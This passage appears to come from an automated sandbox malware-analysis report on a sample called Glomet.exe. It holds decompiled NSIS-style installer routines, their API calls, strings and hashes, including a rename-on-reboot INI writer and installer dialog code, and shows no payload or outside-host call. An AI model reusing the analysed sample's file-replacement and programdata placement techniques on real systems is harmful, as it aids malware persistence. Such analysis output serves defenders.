                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                              • String ID: ARBEJDSTILLADELSER Setup$F
                                                                                                                                                                              • API String ID: 941294808-1239134799
                                                                                                                                                                              • Opcode ID: 2271267dbcbb5a429a5c45712c2942ab76dd5bcbd32f73574c3dae7e133f94db
                                                                                                                                                                              • Instruction ID: 1fbfacec2506b2ab202253b0e42594ede9e170c8a1cf430301d1f688d6e441df
                                                                                                                                                                              • Opcode Fuzzy Hash: 2271267dbcbb5a429a5c45712c2942ab76dd5bcbd32f73574c3dae7e133f94db
                                                                                                                                                                              • Instruction Fuzzy Hash: AA417D71800209AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74E955DFA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405EC0(void* __ecx) {
                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                              				void* __edi;
                                                                                                                                                                              				void* __esi;
                                                                                                                                                                              				long _t12;
                                                                                                                                                                              				long _t24;
                                                                                                                                                                              				char* _t31;
                                                                                                                                                                              				int _t37;
                                                                                                                                                                              				void* _t38;
                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                              				long _t42;
                                                                                                                                                                              				CHAR* _t44;
                                                                                                                                                                              				void* _t46;
                                                                                                                                                                              				void* _t48;
                                                                                                                                                                              				void* _t49;
                                                                                                                                                                              				void* _t52;
                                                                                                                                                                              				void* _t53;
                                                                                                                                                                              
                                                                                                                                                                              				_t38 = __ecx;
                                                                                                                                                                              				_t44 =  *(_t52 + 0x14);
                                                                                                                                                                              				 *0x42c620 = 0x4c554e;
                                                                                                                                                                              				if(_t44 == 0) {
                                                                                                                                                                              					L3:
                                                                                                                                                                              					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
                                                                                                                                                                              					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                                                              						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
                                                                                                                                                                              						_t53 = _t52 + 0x10;
                                                                                                                                                                              						E004062EA(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f430 + 0x128)));
                                                                                                                                                                              						_t12 = E00405DEA(0x42ca20, 0xc0000000, 4);
                                                                                                                                                                              						_t48 = _t12;
                                                                                                                                                                              						 *(_t53 + 0x18) = _t48;
                                                                                                                                                                              						if(_t48 != 0xffffffff) {
                                                                                                                                                                              							_t42 = GetFileSize(_t48, 0);
                                                                                                                                                                              							_t6 = _t37 + 0xa; // 0xa
                                                                                                                                                                              							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                                                                              							if(_t46 == 0 || E00405E62(_t48, _t46, _t42) == 0) {
                                                                                                                                                                              								L18:
                                                                                                                                                                              								return CloseHandle(_t48);
                                                                                                                                                                              							} else {
                                                                                                                                                                              								if(E00405D4F(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                                                                              									_t49 = E00405D4F(_t38, _t21 + 0xa, 0x40a3d8);
                                                                                                                                                                              									if(_t49 == 0) {
                                                                                                                                                                              										_t48 =  *(_t53 + 0x18);
                                                                                                                                                                              										L16:
                                                                                                                                                                              										_t24 = _t42;
                                                                                                                                                                              										L17:
                                                                                                                                                                              										E00405DA5(_t24 + _t46, 0x42c220, _t37);
                                                                                                                                                                              										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                                                                              										E00405E91(_t48, _t46, _t42 + _t37);
                                                                                                                                                                              										GlobalFree(_t46);
                                                                                                                                                                              										goto L18;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t39 = _t46 + _t42;
                                                                                                                                                                              									_t31 = _t39 + _t37;
                                                                                                                                                                              									while(_t39 > _t49) {
                                                                                                                                                                              										 *_t31 =  *_t39;
                                                                                                                                                                              										_t31 = _t31 - 1;
                                                                                                                                                                              										_t39 = _t39 - 1;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t24 = _t49 - _t46 + 1;
                                                                                                                                                                              									_t48 =  *(_t53 + 0x18);
                                                                                                                                                                              									goto L17;
                                                                                                                                                                              								}
                                                                                                                                                                              								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                                                                              								_t42 = _t42 + 0xa;
                                                                                                                                                                              								goto L16;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              				} else {
                                                                                                                                                                              					CloseHandle(E00405DEA(_t44, 0, 1));
                                                                                                                                                                              					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
                                                                                                                                                                              					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                                                              						goto L3;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t12;
                                                                                                                                                                              			}


                                                                                                                                                                              APIs
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406051,?,?), ref: 00405EF1
                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00405EFA
                                                                                                                                                                                • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                                                                                                                                • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00405F17
                                                                                                                                                                              • wsprintfA.USER32 ref: 00405F35
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405F70
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
                                                                                                                                                                              • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 0040601E
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406025
                                                                                                                                                                                • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                                                                                                                                • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                              • String ID: %s=%s$[Rename]
                                                                                                                                                                              • API String ID: 2171350718-1727408572
                                                                                                                                                                              • Opcode ID: d7fe0695add532f02f25bf8ecd9f04fee568a4ba3192caa9430eb4a67ab86fce
                                                                                                                                                                              • Instruction ID: 8908439cc2d3cfcd996604707d180e10d826c6d0da91f503aeabb4e5616cbf2a
                                                                                                                                                                              • Opcode Fuzzy Hash: d7fe0695add532f02f25bf8ecd9f04fee568a4ba3192caa9430eb4a67ab86fce
                                                                                                                                                                              • Instruction Fuzzy Hash: 1531E731640B16ABC2207B65AD48F5B3A9CDF45758F14043BFA42F62D2DB7CD8118AAD
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00406535(CHAR* _a4) {
                                                                                                                                                                              				char _t5;
                                                                                                                                                                              				char _t7;
                                                                                                                                                                              				char* _t15;
                                                                                                                                                                              				char* _t16;
                                                                                                                                                                              				CHAR* _t17;
                                                                                                                                                                              
                                                                                                                                                                              				_t17 = _a4;
                                                                                                                                                                              				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                                                                                              					_t17 =  &(_t17[4]);
                                                                                                                                                                              				}
                                                                                                                                                                              				if( *_t17 != 0 && E00405C56(_t17) != 0) {
                                                                                                                                                                              					_t17 =  &(_t17[2]);
                                                                                                                                                                              				}
                                                                                                                                                                              				_t5 =  *_t17;
                                                                                                                                                                              				_t15 = _t17;
                                                                                                                                                                              				_t16 = _t17;
                                                                                                                                                                              				if(_t5 != 0) {
                                                                                                                                                                              					do {
                                                                                                                                                                              						if(_t5 > 0x1f &&  *((char*)(E00405C14("*?|<>/\":", _t5))) == 0) {
                                                                                                                                                                              							E00405DA5(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                                                                                              							_t16 = CharNextA(_t16);
                                                                                                                                                                              						}
                                                                                                                                                                              						_t17 = CharNextA(_t17);
                                                                                                                                                                              						_t5 =  *_t17;
                                                                                                                                                                              					} while (_t5 != 0);
                                                                                                                                                                              				}
                                                                                                                                                                              				 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                                              				while(1) {
                                                                                                                                                                              					_t16 = CharPrevA(_t15, _t16);
                                                                                                                                                                              					_t7 =  *_t16;
                                                                                                                                                                              					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                                                                              						break;
                                                                                                                                                                              					}
                                                                                                                                                                              					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                                              					if(_t15 < _t16) {
                                                                                                                                                                              						continue;
                                                                                                                                                                              					}
                                                                                                                                                                              					break;
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t7;
                                                                                                                                                                              			}









                                                                                                                                                                              APIs
                                                                                                                                                                              • CharNextA.USER32(0000000B,*?|<>/":,00000000,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                                                                                                              • CharNextA.USER32(0000000B,0000000B,0000000B,00000000,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659A
                                                                                                                                                                              • CharNextA.USER32(0000000B,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659F
                                                                                                                                                                              • CharPrevA.USER32(0000000B,0000000B,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004065AF
                                                                                                                                                                              Strings
                                                                                                                                                                              • "C:\programdata\Glomet.exe" , xrefs: 00406535
                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406536
                                                                                                                                                                              • *?|<>/":, xrefs: 0040657D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                              • String ID: "C:\programdata\Glomet.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                              • API String ID: 589700163-2133002319
                                                                                                                                                                              • Opcode ID: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                                                                                                                                              • Instruction ID: f1a46c244338e9c327de57877a99ef2f1f2ce6c7380876dc27bda46ebf0462ee
                                                                                                                                                                              • Opcode Fuzzy Hash: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                                                                                                                                              • Instruction Fuzzy Hash: 671134918047903DFB3216386C04B776FC94F9B760F5A007BE4C2722CAC63C5CA6826D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040433B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                                                              				struct tagLOGBRUSH _v16;
                                                                                                                                                                              				long _t39;
                                                                                                                                                                              				long _t41;
                                                                                                                                                                              				void* _t44;
                                                                                                                                                                              				signed char _t50;
                                                                                                                                                                              				long* _t54;
                                                                                                                                                                              
                                                                                                                                                                              				if(_a4 + 0xfffffecd > 5) {
                                                                                                                                                                              					L18:
                                                                                                                                                                              					return 0;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                                                                                              				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                                                                                                              					goto L18;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t50 = _t54[5];
                                                                                                                                                                              					if((_t50 & 0xffffffe0) != 0) {
                                                                                                                                                                              						goto L18;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t39 =  *_t54;
                                                                                                                                                                              					if((_t50 & 0x00000002) != 0) {
                                                                                                                                                                              						_t39 = GetSysColor(_t39);
                                                                                                                                                                              					}
                                                                                                                                                                              					if((_t54[5] & 0x00000001) != 0) {
                                                                                                                                                                              						SetTextColor(_a8, _t39);
                                                                                                                                                                              					}
                                                                                                                                                                              					SetBkMode(_a8, _t54[4]);
                                                                                                                                                                              					_t41 = _t54[1];
                                                                                                                                                                              					_v16.lbColor = _t41;
                                                                                                                                                                              					if((_t54[5] & 0x00000008) != 0) {
                                                                                                                                                                              						_t41 = GetSysColor(_t41);
                                                                                                                                                                              						_v16.lbColor = _t41;
                                                                                                                                                                              					}
                                                                                                                                                                              					if((_t54[5] & 0x00000004) != 0) {
                                                                                                                                                                              						SetBkColor(_a8, _t41);
                                                                                                                                                                              					}
                                                                                                                                                                              					if((_t54[5] & 0x00000010) != 0) {
                                                                                                                                                                              						_v16.lbStyle = _t54[2];
                                                                                                                                                                              						_t44 = _t54[3];
                                                                                                                                                                              						if(_t44 != 0) {
                                                                                                                                                                              							DeleteObject(_t44);
                                                                                                                                                                              						}
                                                                                                                                                                              						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                                                                                                              					}
                                                                                                                                                                              					return _t54[3];
                                                                                                                                                                              				}
                                                                                                                                                                              			}










                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                              • Opcode ID: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                                                                                                                                              • Instruction ID: d64fbe2596ca860a271eaf52242e9b3e10407c8dba4713a28e38d7cfcaef20bb
                                                                                                                                                                              • Opcode Fuzzy Hash: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                                                                                                                                              • Instruction Fuzzy Hash: 822174716007049FCB30DF68D908B5BBBF8AF81710B04892EED96A26E1C734D915CB54
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00404C27(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                              				long _v8;
                                                                                                                                                                              				signed char _v12;
                                                                                                                                                                              				unsigned int _v16;
                                                                                                                                                                              				void* _v20;
                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                              				long _v56;
                                                                                                                                                                              				void* _v60;
                                                                                                                                                                              				long _t15;
                                                                                                                                                                              				unsigned int _t19;
                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                              				struct HWND__* _t28;
                                                                                                                                                                              
                                                                                                                                                                              				_t28 = _a4;
                                                                                                                                                                              				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                                                                                              				if(_a8 == 0) {
                                                                                                                                                                              					L4:
                                                                                                                                                                              					_v56 = _t15;
                                                                                                                                                                              					_v60 = 4;
                                                                                                                                                                              					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                                                                                              					return _v24;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t19 = GetMessagePos();
                                                                                                                                                                              				_v16 = _t19 >> 0x10;
                                                                                                                                                                              				_v20 = _t19;
                                                                                                                                                                              				ScreenToClient(_t28,  &_v20);
                                                                                                                                                                              				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                                                                                              				if((_v12 & 0x00000066) != 0) {
                                                                                                                                                                              					_t15 = _v8;
                                                                                                                                                                              					goto L4;
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t25 | 0xffffffff;
                                                                                                                                                                              			}















                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C42
                                                                                                                                                                              • GetMessagePos.USER32 ref: 00404C4A
                                                                                                                                                                              • ScreenToClient.USER32 ref: 00404C64
                                                                                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C76
                                                                                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C9C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                              • String ID: f
                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                              • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                                              • Instruction ID: 6a0354fd0873e2a66e4e803e7b6bfaf8a717de4a4c12bc6328b4bc3a065c57a7
                                                                                                                                                                              • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                                              • Instruction Fuzzy Hash: DB015E71900219BAEB00DBA4DD85BFFBBBCAF55B25F10012BBB40B61D0C7B499018BA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                                              			E00401E35(intOrPtr __edx) {
                                                                                                                                                                              				void* __esi;
                                                                                                                                                                              				int _t9;
                                                                                                                                                                              				signed char _t15;
                                                                                                                                                                              				struct HFONT__* _t18;
                                                                                                                                                                              				intOrPtr _t30;
                                                                                                                                                                              				struct HDC__* _t31;
                                                                                                                                                                              				void* _t33;
                                                                                                                                                                              				void* _t35;
                                                                                                                                                                              
                                                                                                                                                                              				_t30 = __edx;
                                                                                                                                                                              				_t31 = GetDC( *(_t35 - 8));
                                                                                                                                                                              				_t9 = E00402C17(2);
                                                                                                                                                                              				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                                                                                                              				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                                                                                                              				ReleaseDC( *(_t35 - 8), _t31);
                                                                                                                                                                              				 *0x40b848 = E00402C17(3);
                                                                                                                                                                              				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                                                                                                                              				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                                                                                                              				 *0x40b84f = 1;
                                                                                                                                                                              				 *0x40b84c = _t15 & 0x00000001;
                                                                                                                                                                              				 *0x40b84d = _t15 & 0x00000002;
                                                                                                                                                                              				 *0x40b84e = _t15 & 0x00000004;
                                                                                                                                                                              				E004062EA(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
                                                                                                                                                                              				_t18 = CreateFontIndirectA(0x40b838);
                                                                                                                                                                              				_push(_t18);
                                                                                                                                                                              				_push(_t33);
                                                                                                                                                                              				E004061B5();
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}












                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(?), ref: 00401E38
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                                                                                                              • ReleaseDC.USER32 ref: 00401E6B
                                                                                                                                                                              • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                              • String ID: Calibri
                                                                                                                                                                              • API String ID: 3808545654-1409258342
                                                                                                                                                                              • Opcode ID: 9b11d4c019c816d20c1c21f539ca41ee850594db86684445f923bb2a1dbfe0ac
                                                                                                                                                                              • Instruction ID: 7d8b70fc9580f7c0a3656fe434d2777149f8876c9caaa3587920b0b4353cf884
                                                                                                                                                                              • Opcode Fuzzy Hash: 9b11d4c019c816d20c1c21f539ca41ee850594db86684445f923bb2a1dbfe0ac
                                                                                                                                                                              • Instruction Fuzzy Hash: 04019E72504240AFE7007BB0AF4AA9A7FF8EB55305F10847DF281B61F2CB7804888B6C
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00402E25(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                              				char _v68;
                                                                                                                                                                              				int _t11;
                                                                                                                                                                              				int _t20;
                                                                                                                                                                              
                                                                                                                                                                              				if(_a8 == 0x110) {
                                                                                                                                                                              					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                                                                              					_a8 = 0x113;
                                                                                                                                                                              				}
                                                                                                                                                                              				if(_a8 == 0x113) {
                                                                                                                                                                              					_t20 =  *0x41d440; // 0x52b4c
                                                                                                                                                                              					_t11 =  *0x42944c; // 0x54a40
                                                                                                                                                                              					if(_t20 >= _t11) {
                                                                                                                                                                              						_t20 = _t11;
                                                                                                                                                                              					}
                                                                                                                                                                              					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                                                                                                              					SetWindowTextA(_a4,  &_v68);
                                                                                                                                                                              					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                                                                                              				}
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}







                                                                                                                                                                              APIs
                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E40
                                                                                                                                                                              • MulDiv.KERNEL32(00052B4C,00000064,00054A40), ref: 00402E6B
                                                                                                                                                                              • wsprintfA.USER32 ref: 00402E7B
                                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402E8B
                                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 00402E9D
                                                                                                                                                                              Strings
                                                                                                                                                                              • verifying installer: %d%%, xrefs: 00402E75
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                                              • Opcode ID: eba7e3e6a7a9e8d042f95bb146de847513e93a7983d8e04ff54a2d99dc20c472
                                                                                                                                                                              • Instruction ID: 3badc6b09a90e5cd1525348ef4ea74cecb255546bda3c46a06932aa9f71b5be3
                                                                                                                                                                              • Opcode Fuzzy Hash: eba7e3e6a7a9e8d042f95bb146de847513e93a7983d8e04ff54a2d99dc20c472
